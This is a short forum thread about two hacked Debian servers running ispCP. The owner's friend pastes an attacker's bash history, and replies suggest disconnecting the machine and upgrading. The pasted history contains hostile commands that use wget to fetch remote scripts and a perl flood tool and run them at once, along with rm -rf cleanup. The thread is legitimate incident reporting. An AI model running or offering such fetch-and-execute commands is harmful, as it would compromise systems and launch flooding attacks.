Threaded Mode | Linear Mode

robmorin · 05-06-2011 02:00 AM

Hello all long time no post Smile

I had a friend call me to say he had 2 Debain servers acting funny , it turns out they were both hacked and both servers run ISPCP

Both server had weird running perl scripts and httpd binaries running as user vu2000

he is using version
ispCP 1.0.0 RC7 OMEGA
build: 20081212
Priamos

that user has no shell in passwd file, however the .bash_history file for that user on both boxes had this in it

/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood

There must be an exploit somewhere...

Now i left one box running hacked still as to maybe find more info to help out in case it is an exploit... so whats the next step?

Thanks...

**fluser** · 05-06-2011 07:09 PM

Cut the network cable! That would be the first thing.

c0urier · 05-07-2011 12:25 AM

As far as I know there has been several exploits since 1.0.0-RC7 - Ever thought about upgradeing to a newer version ex. 1.0.7?

Threaded Mode \| Linear Mode 2 Omega boxes hacked...
Author	Message